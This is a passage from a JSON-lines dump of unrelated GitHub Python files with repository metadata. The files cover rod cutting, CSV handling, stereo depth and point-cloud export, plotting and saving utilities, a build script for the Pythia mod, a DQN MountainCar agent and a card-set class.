- 1])\n return dp[n]\n \n\n \n \n\n\n#{ \n # Driver Code Starts\n#Initial Template for Python 3\n\ndef main():\n\n T = int(input())\n\n while(T > 0):\n n = int(input())\n a = [int(x) for x in input().strip().split()]\n ob = Solution()\n print(ob.cutRod(a, n))\n\n T -= 1\n\n\nif __name__ == \"__main__\":\n main()\n# } Driver Code Ends","repo_name":"akashprap/Coding-Problems","sub_path":"Medium/Rod Cutting/rod-cutting.py","file_name":"rod-cutting.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42455348713","text":"#!/usr/bin/env python3\n\n\"\"\"Example of using the CSV package\"\"\"\n\n__author__ = 'Kayleigh Greenwood (kayleigh.greenwood21@imperial.ac.uk)'\n__version__ = '0.0.1'\n\n# IMPORTS\n\nimport csv\n\n# SCRIPT\n\nprint(\"Task 1\")\n# Read a file containing:'Species','Infraorder','Family','Distribution','Body mass male (Kg)'\nwith open('../data/testcsv.csv','r') as f: # opens the file as read\n csvread = csv.reader(f) # creates a csvread variable and stores the test.csv file\n temp = [] # creates a list named temp\n for row in csvread: #creates a loop to iterate through the rows in the csvread variable, which contains a copy of test.csv\n if row[0] == 'Species':\n continue\n temp.append(tuple(row)) # converts each row into a tuple, and adds this tuple to the temp list. 
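# [Annotation, not part of the coursework file] The same header-skipping read can
# be written with csv.DictReader, which consumes the header row implicitly; this
# sketch assumes the 'Species' column name listed at the top of the script.
import csv

with open('../data/testcsv.csv', 'r') as fh:
    for record in csv.DictReader(fh):
        print("The species is", record['Species'])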
\n print(row) # prints each row to the terminal\n print(\"The species is\", row[0], \"\\n\") #prints to the terminal the species name of each row\n\n\nprint(\"Task 2\")\n# write a file containing only species name and Body mass\nwith open('../data/testcsv.csv','r') as f: # opens testcsv.csv to read\n with open('../data/bodymass.csv','w') as g: # opens a file to write the new information in\n csvread = csv.reader(f) # opens testcsv.csv to read it\n csvwrite = csv.writer(g) # opens bodymass.csv to write it\n for row in csvread: #creates a for loop to iterate through the rows\n if row[0] == 'Species':\n continue\n print(row) #prints the row to this terminal\n csvwrite.writerow([row[0], row[4]]) #writes the first and fifth columns into the bodymass.csv file\n","repo_name":"kayleigh-greenwood/CMEECoursework","sub_path":"week.2/code/basic_csv.py","file_name":"basic_csv.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38030244804","text":"#https://medium.com/@omar.ps16/stereo-3d-reconstruction-with-opencv-using-an-iphone-camera-part-iii-95460d3eddf0 \n#I wrote the point cloud conversion part by referring to the post above\n\n#The create_output() function\n#https://github.com/erget/StereoVision/blob/master/stereovision/point_cloud.py \n#was taken from here!\n#hstack the points and colors, save them as a .ply, and view the result in MeshLab.\n#Below is stereo_depth.py; please quit with q, otherwise the output file gets corrupted!\nimport numpy as np\nimport cv2\nimport argparse\nimport sys\nfrom calibration_store import load_stereo_coefficients\n\ndef depth_map(left_rectified, right_rectified):\n \"\"\" Depth map calculation. Works with SGBM and WLS. Need rectified images, returns depth map ( left to right disparity ) \"\"\"\n # SGBM Parameters -----------------\n window_size = 3 # wsize default 3; 5; 7 for SGBM reduced size image; 15 for SGBM full size image (1300px and above); 5 Works nicely\n # We need grayscale for disparity map.\n imgL = cv2.cvtColor(left_rectified, cv2.COLOR_BGR2GRAY)\n imgR = cv2.cvtColor(right_rectified, cv2.COLOR_BGR2GRAY)\n left_matcher = cv2.StereoSGBM_create(\n minDisparity=-1,\n numDisparities=5*16, # max_disp has to be dividable by 16 f. E. HH 192, 256\n blockSize=window_size,\n P1=8 * 3 * window_size,\n # wsize default 3; 5; 7 for SGBM reduced size image; 15 for SGBM full size image (1300px and above); 5 Works nicely\n P2=32 * 3 * window_size,\n disp12MaxDiff=12,\n uniquenessRatio=10,\n speckleWindowSize=50,\n speckleRange=32,\n preFilterCap=63,\n mode=cv2.STEREO_SGBM_MODE_SGBM_3WAY\n )\n right_matcher = cv2.ximgproc.createRightMatcher(left_matcher)\n # FILTER Parameters\n lmbda = 80000\n sigma = 1.3\n visual_multiplier = 6\n\n wls_filter = cv2.ximgproc.createDisparityWLSFilter(matcher_left=left_matcher)\n wls_filter.setLambda(lmbda)\n\n wls_filter.setSigmaColor(sigma)\n displ = left_matcher.compute(imgL, imgR) # .astype(np.float32)/16\n dispr = right_matcher.compute(imgR, imgL) # .astype(np.float32)/16\n displ = np.int16(displ)\n dispr = np.int16(dispr)\n\n filteredImg = wls_filter.filter(displ, imgL, None, dispr) # important to put \"imgL\" here!!!\n filteredImg = cv2.normalize(src=filteredImg, dst=filteredImg, beta=0, alpha=255, norm_type=cv2.NORM_MINMAX);\n filteredImg = np.uint8(filteredImg)\n\n #https://medium.com/@omar.ps16/stereo-3d-reconstruction-with-opencv-using-an-iphone-camera-part-iii-95460d3eddf0\n #These SGBM parameters were taken from the post above! Honestly there is little difference in practice; 
you can use filteredImg here instead.\n win_size = 5\n min_disp = -1\n max_disp = 63 # min_disp * 9\n num_disp = max_disp - min_disp # Needs to be divisible by 16\n # Create Block matching object.\n stereo = cv2.StereoSGBM_create(minDisparity=-1,\n numDisparities=num_disp,\n blockSize=5,\n uniquenessRatio=5,\n speckleWindowSize=5,\n speckleRange=5,\n disp12MaxDiff=1,\n P1=8 * 3 * win_size ** 2, # 8*3*win_size**2,\n P2=32 * 3 * win_size ** 2) # 32*3*win_size**2)\n dispmap = stereo.compute(imgL, imgR)\n dispmap = cv2.normalize(src=dispmap, dst=dispmap, beta=0, alpha=255, norm_type=cv2.NORM_MINMAX);\n point_cloud(dispmap,left_rectified)\n return filteredImg\n\ndef point_cloud(filteredImg,imgL):\n #https://medium.com/@omar.ps16/stereo-3d-reconstruction-with-opencv-using-an-iphone-camera-part-iii-95460d3eddf0\n # Q was taken from steror_cam.yml\n Q = np.float32([[ 1., 0., 0., -4.6851158237457275e+02],\n [0., 1., 0., -2.6415181350708008e+02],\n [ 0., 0., 0., 5.3994586146833012e+02,],\n [ 0., 0., 1.6558455087828328e+01, 0.]])\n # This transformation matrix is derived from Prof. Didier Stricker's power point presentation on computer vision.\n # Link : https://ags.cs.uni-kl.de/fileadmin/inf_ags/3dcv-ws14-15/3DCV_lec01_camera.pdf\n\n # Reproject points into 3D\n points_3D = cv2.reprojectImageTo3D(filteredImg, Q)\n # Get color points\n colors = cv2.cvtColor(imgL, cv2.COLOR_BGR2RGB)\n # Get rid of points with value 0 (i.e no depth)\n mask_map = filteredImg > filteredImg.min()\n # Mask colors and points.\n output_points = points_3D[mask_map]\n output_colors = colors[mask_map]\n # Define name for output file\n output_file = 'reconstructed.ply'\n # Generate point cloud\n print (\"\\n Creating the output file... \\n\")\n create_output(output_points, output_colors, output_file)\n\ndef create_output(output_points, output_colors, output_file):\n #https://github.com/erget/StereoVision/blob/master/stereovision/point_cloud.py\n #This is the PLY-saving routine taken from the repo above.
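# [Annotation, not from the source script] A hedged sketch of what the Q matrix
# above does inside cv2.reprojectImageTo3D: [X Y Z W]^T = Q @ [x y d 1]^T with a
# final divide by W, so depth reduces to Z = Q[2][3] / (Q[3][2] * d), i.e.
# focal_length * baseline / disparity. The disparity value below is made up.
f_px = 5.3994586146833012e+02          # Q[2][3], focal length in pixels
inv_baseline = 1.6558455087828328e+01  # Q[3][2], roughly -1/Tx
d = 40.0                               # hypothetical disparity in pixels
depth = f_px / (inv_baseline * d)      # ~0.82 in the calibration's length units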
#Open the resulting .ply file in MeshLab!\n ply_header = (\n '''ply\n format ascii 1.0\n element vertex {vertex_count}\n property float x\n property float y\n property float z\n property uchar red\n property uchar green\n property uchar blue\n end_header\n ''')\n points = np.hstack([output_points, output_colors])\n with open(output_file, 'w') as outfile:\n outfile.write(ply_header.format(\n vertex_count=len(points)))\n np.savetxt(outfile, points, '%f %f %f %d %d %d')\n\n\n\nif __name__ == '__main__':\n # Args handling -> check help parameters to understand\n parser = argparse.ArgumentParser(description='Camera calibration')\n parser.add_argument('--calibration_file', type=str, required=True, help='Path to the stereo calibration file')\n parser.add_argument('--left_source', type=str, required=True, help='Left video or v4l2 device name')\n parser.add_argument('--right_source', type=str, required=True, help='Right video or v4l2 device name')\n parser.add_argument('--is_real_time', type=int, required=True, help='Is it camera stream or video')\n\n args = parser.parse_args()\n\n # is camera stream or video\n if args.is_real_time:\n cap_left = cv2.VideoCapture(args.left_source, cv2.CAP_V4L2)\n cap_right = cv2.VideoCapture(args.right_source, cv2.CAP_V4L2)\n else:\n cap_left = cv2.VideoCapture(args.left_source)\n cap_right = cv2.VideoCapture(args.right_source)\n\n K1, D1, K2, D2, R, T, E, F, R1, R2, P1, P2, Q = load_stereo_coefficients(args.calibration_file) # Get cams params\n\n if not cap_left.isOpened() and not cap_right.isOpened(): # If we can't get images from both sources, error\n print(\"Can't open the streams!\")\n sys.exit(-9)\n\n # Change the resolution if needed\n cap_right.set(cv2.CAP_PROP_FRAME_WIDTH, 640) # float\n cap_right.set(cv2.CAP_PROP_FRAME_HEIGHT, 480) # float\n\n cap_left.set(cv2.CAP_PROP_FRAME_WIDTH, 640) # float\n cap_left.set(cv2.CAP_PROP_FRAME_HEIGHT, 480) # float\n\n while True: # Loop until 'q' pressed or stream ends\n # Grab & retrieve for synced images\n if not (cap_left.grab() and cap_right.grab()):\n print(\"No more frames\")\n break\n\n _, leftFrame = cap_left.retrieve()\n _, rightFrame = cap_right.retrieve()\n height, width, channel = leftFrame.shape # We will use the shape for remap\n\n # Undistortion and Rectification part!\n leftMapX, leftMapY = cv2.initUndistortRectifyMap(K1, D1, R1, P1, (width, height), cv2.CV_32FC1)\n left_rectified = cv2.remap(leftFrame, leftMapX, leftMapY, cv2.INTER_LINEAR, cv2.BORDER_CONSTANT)\n rightMapX, rightMapY = cv2.initUndistortRectifyMap(K2, D2, R2, P2, (width, height), cv2.CV_32FC1)\n right_rectified = cv2.remap(rightFrame, rightMapX, rightMapY, cv2.INTER_LINEAR, cv2.BORDER_CONSTANT)\n\n\n disparity_image = depth_map(left_rectified, right_rectified) # Get the disparity map\n\n # Show the images\n cv2.imshow('left(R)', leftFrame)\n cv2.imshow('right(R)', rightFrame)\n cv2.imshow('Disparity', disparity_image)\n\n if cv2.waitKey(1) & 0xFF == ord('q'): # Get key to stop stream. 
Press q for exit\n break\n\n # Release the sources.\n cap_left.release()\n cap_right.release()\n cv2.destroyAllWindows()\n","repo_name":"philgineer/Deeplearning_projects","sub_path":"pill_detection&classification/00_crawling.py","file_name":"00_crawling.py","file_ext":"py","file_size_in_byte":8261,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3341952478","text":"import csv\nimport json\nimport os\nimport pickle\nfrom operator import itemgetter\nfrom pathlib import Path\nfrom random import shuffle\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\n\n\ndef _handle_dirs(pathname, foldername, subfoldername):\n path = Path(pathname)\n if foldername is not None:\n path = path / foldername\n if not os.path.isdir(path):\n os.mkdir(path)\n if subfoldername is not None:\n path = path / subfoldername\n if not os.path.isdir(path):\n os.mkdir(path)\n return path\n\n\ndef savefig(\n name,\n format=\"png\",\n dpi=300,\n foldername=None,\n subfoldername=\"figs\",\n pathname=\"./maggot_models/notebooks/outs\",\n bbox_inches=\"tight\",\n pad_inches=0.5,\n save_on=True,\n transparent=False,\n print_out=True,\n **kws,\n):\n if save_on:\n path = _handle_dirs(pathname, foldername, subfoldername)\n savename = path / str(name + \".\" + format)\n plt.savefig(\n savename,\n format=format,\n facecolor=\"white\",\n transparent=transparent,\n bbox_inches=bbox_inches,\n pad_inches=pad_inches,\n dpi=dpi,\n **kws,\n )\n if print_out:\n print(f\"Saved figure to {savename}\")\n\n\ndef saveobj(\n obj,\n name,\n foldername=None,\n subfoldername=\"objs\",\n pathname=\"./maggot_models/notebooks/outs\",\n save_on=True,\n):\n if save_on:\n path = _handle_dirs(pathname, foldername, subfoldername)\n savename = path / str(name + \".pickle\")\n with open(savename, \"wb\") as f:\n pickle.dump(obj, f)\n print(f\"Saved object to {savename}\")\n\n\ndef saveskels(\n name,\n ids,\n labels,\n colors=None,\n palette=\"tab10\",\n foldername=None,\n subfoldername=\"jsons\",\n pathname=\"./maggot_models/notebooks/outs\",\n multiout=False,\n save_on=True,\n postfix=\"\",\n):\n \"\"\"Take a list of skeleton ids and output as json file for catmaid\n\n Parameters\n ----------\n name : str\n filename to save output\n ids : list or array\n skeleton ids\n colors : list or array\n either a hexadecimal color for each skeleton or a label for each skeleton to be\n colored by palette\n palette : str or None, optional\n if not None, this is a palette specification to use to color skeletons\n \"\"\"\n if save_on:\n uni_labels = np.unique(labels)\n n_labels = len(uni_labels)\n\n if colors is None:\n if isinstance(palette, str):\n pal = sns.color_palette(palette, n_colors=n_labels)\n pal = pal.as_hex()\n else:\n pal = palette\n # uni_labels = [int(i) for i in uni_labels]\n colormap = dict(zip(uni_labels, pal))\n colors = np.array(itemgetter(*colors)(colormap))\n\n opacs = np.array(len(ids) * [1])\n\n path = _handle_dirs(pathname, foldername, subfoldername)\n\n if multiout:\n\n for l in uni_labels:\n filename = path / str(name + \"-\" + str(l) + postfix + \".json\")\n\n inds = np.where(labels == l)[0]\n\n spec_list = [\n {\"skeleton_id\": int(i), \"color\": str(c), \"opacity\": float(o)}\n for i, c, o in zip(ids[inds], colors[inds], opacs[inds])\n ]\n with open(filename, \"w\") as fout:\n json.dump(spec_list, fout)\n else:\n spec_list = [\n {\"skeleton_id\": int(i), \"color\": str(c), \"opacity\": float(o)}\n for i, c, o in zip(ids, colors, 
opacs)\n ]\n filename = path / str(name + \".json\")\n with open(filename, \"w\") as fout:\n json.dump(spec_list, fout)\n\n if palette is not None:\n # return (spec_list, colormap, pal)\n return spec_list\n else:\n return spec_list\n\n\ndef savecsv(\n df,\n name,\n foldername=None,\n subfoldername=\"csvs\",\n pathname=\"./maggot_models/notebooks/outs\",\n save_on=True,\n):\n if save_on:\n path = _handle_dirs(pathname, foldername, subfoldername)\n savename = path / str(name + \".csv\")\n df.to_csv(savename)\n print(f\"Saved DataFrame to {savename}\")\n\n\ndef savelol(\n lol,\n name,\n foldername=None,\n subfoldername=\"csvs\",\n pathname=\"./maggot_models/notebooks/outs\",\n save_on=True,\n):\n path = _handle_dirs(pathname, foldername, subfoldername)\n savename = path / str(name + \".csv\")\n with open(savename, \"w\") as f:\n wr = csv.writer(f)\n wr.writerows(lol)\n print(f\"Saved list of lists to {savename}\")\n\n\ndef readlol(\n name,\n foldername=None,\n subfoldername=\"csvs\",\n pathname=\"./maggot_models/notebooks/outs\",\n):\n path = _handle_dirs(pathname, foldername, subfoldername)\n savename = path / str(name + \".csv\")\n outer_list = []\n with open(savename, \"r\") as f:\n reader = csv.reader(f)\n for line in reader:\n outer_list.append([int(l) for l in line])\n return outer_list\n\n\ndef readcsv(\n name,\n foldername=None,\n subfoldername=\"csvs\",\n pathname=\"./maggot_models/notebooks/outs\",\n **kws,\n):\n path = _handle_dirs(pathname, foldername, subfoldername)\n savename = path / str(name + \".csv\")\n return pd.read_csv(savename, **kws)\n\n\ndef _write_walk_set(walk_set, f):\n for w in walk_set:\n str_walk = str(w)\n str_walk = str_walk.strip(\"[]\")\n str_walk = str_walk.replace(\"'\", \"\")\n str_walk = str_walk.replace(\",\", \"\")\n f.write(f\"{str_walk}\\n\")\n f.write(\"\\n\")\n\n\ndef save_walks(\n walks, name=\"walks.txt\", outpath=\".\", multidoc=False, shuffle_walks=True\n):\n outpath = Path(outpath)\n outfile = outpath / name\n if not multidoc:\n walks = [walks]\n with open(outfile, \"w\") as f:\n for walk_set in walks:\n if shuffle_walks:\n shuffle(walk_set)\n _write_walk_set(walk_set, f)\n print(f\"Saved walks to {outfile}\")\n","repo_name":"neurodata/maggot_models","sub_path":"src/io/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":6083,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"14834603463","text":"import argparse\nimport os\nimport shutil\nimport stat\nimport subprocess\nimport sys\nfrom datetime import datetime\n\nimport setuptools\nfrom pkg_resources import parse_version\n\nos.chdir(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))\n\n\n# Python 3.7 workaround:\ndef parse_version_wrapper(txt):\n version = parse_version(txt)\n\n try:\n version.major # noqa\n version.minor # noqa\n except AttributeError:\n # Python 3.7 doesn't have these so we patch them in\n version.major = version._version.release[0]\n version.minor = version._version.release[1]\n\n return version\n\n\ndef _verbose_run(cmd, **kwargs):\n print(' '.join(c if ' ' not in c else f'\"{c}\"' for c in cmd), flush=True)\n subprocess.run(cmd, **kwargs)\n\n\ndef clear_pythia_directory():\n base = '@Pythia'\n print(f'Deleting {base} contents...')\n\n def del_rw(action, name, exc):\n \"\"\"Fix permissions in case of a read-only file\"\"\"\n os.chmod(name, stat.S_IWRITE)\n if os.path.isdir(name):\n os.rmdir(name)\n else:\n os.remove(name)\n\n os.makedirs(base, exist_ok=True)\n for filename in 
os.listdir('@Pythia'):\n path = os.path.join(base, filename)\n if os.path.isdir(path):\n shutil.rmtree(path, onerror=del_rw)\n else:\n os.unlink(path)\n\n\ndef create_interpreters(version, dest):\n version = parse_version_wrapper(version)\n print(f'Creating Python {version} interpreters in \"{dest}\" directory...', flush=True)\n subprocess.run([sys.executable, os.path.join('tools', 'create_embedded_python.py'), '--version', str(version), dest], check=True)\n\n\ndef _get_embed(version, system, arch):\n embed = {\n 'linux': {\n 'x86': os.path.join('@Pythia', f'python-{version.major}{version.minor}-embed-linux32', 'bin', 'python3'),\n 'x64': os.path.join('@Pythia', f'python-{version.major}{version.minor}-embed-linux64', 'bin', 'python3'),\n },\n 'windows': {\n 'x86': os.path.join('@Pythia', f'python-{version.major}{version.minor}-embed-win32', 'python.exe'),\n 'x64': os.path.join('@Pythia', f'python-{version.major}{version.minor}-embed-amd64', 'python.exe'),\n }\n }\n\n return embed[system][arch]\n\n\ndef build_binaries(version, arch, system, run_tests=True):\n version = parse_version_wrapper(version)\n print(f'Building {arch} binaries for {system}...', flush=True)\n\n if system == 'linux':\n env = None\n else:\n env = setuptools.msvc.msvc14_get_vc_env(arch)\n\n if os.path.exists('ninja'):\n shutil.rmtree('ninja')\n os.makedirs('ninja')\n\n if system == 'linux':\n platform = ['--platform', 'linux/386'] if arch == 'x86' else []\n _verbose_run(['docker', 'build', '-f', f'Dockerfile.{arch}'] + platform + ['-t', 'pythia:latest', '.'], check=True)\n # Workaround for GitHub Actions\n # This is to fix GIT not liking owner of the checkout dir (git callback in cmake)\n # https://github.com/actions/runner/issues/2033\n uid_gid = ['-u', f'{os.getuid()}:{os.getgid()}'] if sys.platform == 'linux' else []\n docker_prefix = ['docker', 'run'] + platform + uid_gid + ['--rm', '-v', f'{os.getcwd()}/:/data', '-w', '/data/ninja', 'pythia:latest']\n shell = False\n else:\n docker_prefix = []\n shell = True\n\n _verbose_run(docker_prefix + ['cmake', '-G', 'Ninja', f'-DUSE_64BIT_BUILD={\"ON\" if arch == \"x64\" else \"OFF\"}', '-DCMAKE_BUILD_TYPE=RelWithDebInfo', '..'], check=True, cwd='ninja', env=env, shell=shell)\n _verbose_run(docker_prefix + ['ninja'], check=True, cwd='ninja', env=env, shell=shell)\n\n\ndef run_tests(version, arch, system):\n version = parse_version_wrapper(version)\n print(f'Running tests for {arch} {system}...', flush=True)\n\n _verbose_run([_get_embed(version, system, arch), os.path.join('tests', 'tests.py')], check=True)\n\n\ndef build_pbos():\n print('Building PBOs...', flush=True)\n subprocess.run([sys.executable, os.path.join('tools', 'create_pbos.py')], check=True)\n\n\ndef copy_templates(version):\n version = parse_version_wrapper(version)\n print('Copying files to @Pythia folder...', flush=True)\n\n for f in os.listdir('templates'):\n with open(os.path.join('templates', f), 'rb') as fread:\n with open(os.path.join('@Pythia', f), 'wb') as fwrite:\n data = fread.read()\n data = data.replace(b'{version}', f'{version.major}{version.minor}'.encode('ascii'))\n # https://stackoverflow.com/a/15919878/6543759\n kind = (1 << 62) # UTC\n ticks = int((datetime.utcnow() - datetime(1, 1, 1)).total_seconds() * (10 ** 7))\n dotnet_timestamp = str(ticks | kind)\n data = data.replace(b'{dotnet_timestamp}', dotnet_timestamp.encode('ascii'))\n fwrite.write(data)\n\n\ndef safety_checks(version):\n version = parse_version_wrapper(version)\n print('Running safety checks...', flush=True)\n 
subprocess.run([sys.executable, os.path.join('tools', 'safety_checks.py'), str(version)], check=True)\n\n\ndef pack_mod():\n print('Packing the resulting mod to a tbz file...', flush=True)\n shutil.make_archive('@Pythia', 'bztar', root_dir='.', base_dir='@Pythia')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers(required=True, dest='command')\n\n parser_create_interpreters = subparsers.add_parser('create_interpreters')\n parser_create_interpreters.add_argument('version')\n parser_create_interpreters.add_argument('--dest', default='@Pythia')\n parser_create_interpreters.set_defaults(func=create_interpreters)\n\n parser_copy_templates = subparsers.add_parser('copy_templates')\n parser_copy_templates.add_argument('version')\n parser_copy_templates.set_defaults(func=copy_templates)\n\n parser_build_binaries = subparsers.add_parser('build_binaries')\n parser_build_binaries.add_argument('version')\n parser_build_binaries.add_argument('arch', choices=['x86', 'x64'])\n parser_build_binaries.add_argument('system', choices=['windows', 'linux'], type=str.lower)\n parser_build_binaries.set_defaults(func=build_binaries)\n\n parser_run_tests = subparsers.add_parser('run_tests')\n parser_run_tests.add_argument('version')\n parser_run_tests.add_argument('arch', choices=['x86', 'x64'])\n parser_run_tests.add_argument('system', choices=['windows', 'linux'], type=str.lower)\n parser_run_tests.set_defaults(func=run_tests)\n\n parser_build_pbos = subparsers.add_parser('build_pbos')\n parser_build_pbos.set_defaults(func=build_pbos)\n\n parser_safety_checks = subparsers.add_parser('safety_checks')\n parser_safety_checks.add_argument('version')\n parser_safety_checks.set_defaults(func=safety_checks)\n\n parser_pack_mod = subparsers.add_parser('pack_mod')\n parser_pack_mod.set_defaults(func=pack_mod)\n\n parser_clear_pythia_directory = subparsers.add_parser('clear_pythia_directory')\n parser_clear_pythia_directory.set_defaults(func=clear_pythia_directory)\n\n args_vars = vars(parser.parse_args())\n\n # Python 3.7 required add_subparsers(dest='...') for when the command is\n # missing. 
So we need to pop it here so we don't pass it to functions\n del args_vars['command']\n\n func = args_vars.pop('func')\n func(**args_vars)\n","repo_name":"overfl0/Pythia","sub_path":"tools/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":7359,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"53"} +{"seq_id":"40421046974","text":"import gym\nimport numpy as np\nimport random\nfrom keras.models import Sequential, load_model\nfrom keras.layers import Dense, Dropout\nfrom keras.optimizers import Adam\n\nfrom collections import deque\n\n\nclass DQN:\n def __init__(self, env):\n self.env = env\n self.memory = deque(maxlen=2000)\n\n self.gamma = 0.85\n self.epsilon = 1.0\n self.epsilon_min = 0.01\n self.epsilon_decay = 0.995\n self.learning_rate = 0.005\n self.tau = .125\n\n self.model = self.create_model()\n self.target_model = self.create_model()\n\n def create_model(self):\n model = Sequential()\n state_shape = self.env.observation_space.shape\n model.add(Dense(24, input_dim=state_shape[0], activation=\"relu\"))\n model.add(Dense(48, activation=\"relu\"))\n model.add(Dense(24, activation=\"relu\"))\n model.add(Dense(self.env.action_space.n))\n model.compile(loss=\"mean_squared_error\",\n optimizer=Adam(lr=self.learning_rate))\n return model\n\n def act(self, state):\n self.epsilon *= self.epsilon_decay\n self.epsilon = max(self.epsilon_min, self.epsilon)\n if np.random.random() < self.epsilon:\n return self.env.action_space.sample()\n return np.argmax(self.model.predict(state)[0])\n\n def remember(self, state, action, reward, new_state, done):\n self.memory.append([state, action, reward, new_state, done])\n\n def replay(self):\n batch_size = 32\n if len(self.memory) < batch_size:\n return\n\n samples = random.sample(self.memory, batch_size)\n for sample in samples:\n state, action, reward, new_state, done = sample\n target = self.target_model.predict(state)\n if done:\n target[0][action] = reward\n else:\n Q_future = max(self.target_model.predict(new_state)[0])\n target[0][action] = reward + Q_future * self.gamma\n self.model.fit(state, target, epochs=1, verbose=0)\n\n def target_train(self):\n weights = self.model.get_weights()\n target_weights = self.target_model.get_weights()\n for i in range(len(target_weights)):\n target_weights[i] = weights[i] * self.tau + target_weights[i] * (1 - self.tau)\n self.target_model.set_weights(target_weights)\n\n def save_model(self, fn):\n self.model.save(fn)\n self.target_model.save(\"target_\"+fn)\n\n def load_model(self, fn):\n self.model = load_model(fn)\n\n\ndef main():\n env = gym.make(\"MountainCar-v0\")\n gamma = 0.9\n epsilon = .95\n\n trials = 1000\n trial_len = 500\n\n # updateTargetNetwork = 1000\n dqn_agent = DQN(env=env)\n steps = []\n for trial in range(trials):\n cur_state = env.reset().reshape(1, 2)\n step = 0\n for step in range(trial_len):\n action = dqn_agent.act(cur_state)\n new_state, reward, done, _ = env.step(action)\n\n # reward = reward if not done else -20\n new_state = new_state.reshape(1, 2)\n dqn_agent.remember(cur_state, action, reward, new_state, done)\n\n dqn_agent.replay() # internally iterates default (prediction) model\n dqn_agent.target_train() # iterates target model\n\n cur_state = new_state\n if done:\n break\n if step >= 199:\n print(\"Failed to complete in trial {}\".format(trial))\n if step % 10 == 0:\n dqn_agent.save_model(\"trial-{}.model\".format(trial))\n else:\n print(\"Completed in {} trials\".format(trial))\n 
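# save_model() also writes a 'target_' twin of the target network, which is what run_model() below loads as 'target_success.model'\n            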
dqn_agent.save_model(\"success.model\")\n break\n\n\ndef act(model, state):\n return np.argmax(model.predict(state)[0])\n\n\ndef run_model(filename):\n env = gym.make(\"MountainCar-v0\")\n model = load_model(filename)\n print(f\"model summary: {model.summary()}\")\n\n # trials = 10\n # trial_len = 500\n #\n # # updateTargetNetwork = 1000\n # dqn_agent = DQN(env=env)\n # steps = []\n #\n # env.render()\n # for trial in range(trials):\n # cur_state = env.reset().reshape(1, 2)\n # for step in range(trial_len):\n # action = dqn_agent.act(cur_state)\n # new_state, reward, done, _ = env.step(action)\n #\n # # reward = reward if not done else -20\n # new_state = new_state.reshape(1, 2)\n # dqn_agent.remember(cur_state, action, reward, new_state, done)\n #\n # dqn_agent.replay() # internally iterates default (prediction) model\n # dqn_agent.target_train() # iterates target model\n #\n # cur_state = new_state\n # if done:\n # break\n # if step >= 199:\n # print(\"Failed to complete in trial {}\".format(trial))\n # if step % 10 == 0:\n # dqn_agent.save_model(\"trial-{}.model\".format(trial))\n # else:\n # print(\"Completed in {} trials\".format(trial))\n # dqn_agent.save_model(\"success.model\")\n # break\n\n \"\"\"Evaluate agent's performance after Q-learning\"\"\"\n\n total_epochs, total_penalties = 0, 0\n episodes = 100\n\n for _ in range(episodes):\n print(f\"episode: {_}\")\n state = env.reset().reshape(1, 2)\n epochs, penalties, reward = 0, 0, 0\n\n done = False\n\n while not done:\n env.render()\n action = act(model, state)\n state, reward, done, info = env.step(action)\n state = state.reshape(1, 2)\n # print(state, reward, done, info)\n\n if reward == -1:\n penalties += 1\n\n epochs += 1\n\n total_penalties += penalties\n total_epochs += epochs\n\n print(f\"Results after {episodes} episodes:\")\n print(f\"Average timesteps per episode: {total_epochs / episodes}\")\n print(f\"Average penalties per episode: {total_penalties / episodes}\")\n\n\nif __name__ == \"__main__\":\n # main()\n run_model(\"target_success.model\")\n","repo_name":"TrellixVulnTeam/concepts_YVTE","sub_path":"src/DeepRL/mountain_car_2.py","file_name":"mountain_car_2.py","file_ext":"py","file_size_in_byte":6027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72111944167","text":"from pyfiglet import Figlet\nfrom datetime import datetime\nimport os, time\n\ndef main():\n \n f = Figlet(font='big')\n \n\n def clear_screen(n):\n \n clear = lambda: os.system(\"cls\")\n time.sleep(n)\n clear()\n \n\n def display_clock():\n \n while True:\n try:\n today = datetime.today()\n clock = today.strftime('%I : %M : %S %p')\n print(f.renderText(clock))\n clear_screen(1)\n \n except KeyboardInterrupt as e:\n print(f\"CTRL_C로 중단 되었습니다. 
{e}\")\n break\n \n clear_screen(0)\n display_clock() \n \n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"coolho1129/Interactive-Programming","sub_path":"김찬호_2021114818(06).py","file_name":"김찬호_2021114818(06).py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"30134494979","text":"from .models import *\nfrom .card import Card\n\nclass Set():\n #methods\n @staticmethod\n def get_sets(params):\n sets = select_items('sets', params)\n return sets\n\n @staticmethod\n def get_set_by_id(id):\n set = select_item_by_id('sets', id)\n return set\n\n @staticmethod\n def get_set_by_code(code):\n set = select_first_item('sets', [\"sets.code='%s'\" % code])\n return set\n\n @staticmethod\n def create_set(name, code, booster, release_date, card_count):\n set = insert_item('sets', {'name': name, 'code': code, 'booster': booster, 'release_date': release_date, 'card_count': card_count})\n return set\n\n @staticmethod\n def delete_set(id):\n set = delete_item_with_id('sets', \"id='%i'\" % id)\n return true\n\n @staticmethod\n def booster_rarities(booster):\n clean_booster = []\n for rarity in booster:\n if isinstance(rarity, list):\n if \"rare\" in rarity and \"mythic rare\" in rarity:\n rarity = [\"rare\"] * 7\n rarity.extend([\"mythic rare\"])\n elif \"foil mythic rare\" in rarity and \"foil rare\" in rarity and \"foil uncommon\" in rarity and \"foil common\" in rarity:\n rarity = [\"common\"] * 18\n rarity.extend([\"uncommon\"] * 12)\n rarity.extend([\"rare\"] * 5)\n rarity.append(\"mythic rare\")\n rarity = re.sub(\"foil\\s\", \"\", random.choice(rarity))\n elif rarity == \"land\":\n rarity = \"basic land\"\n if 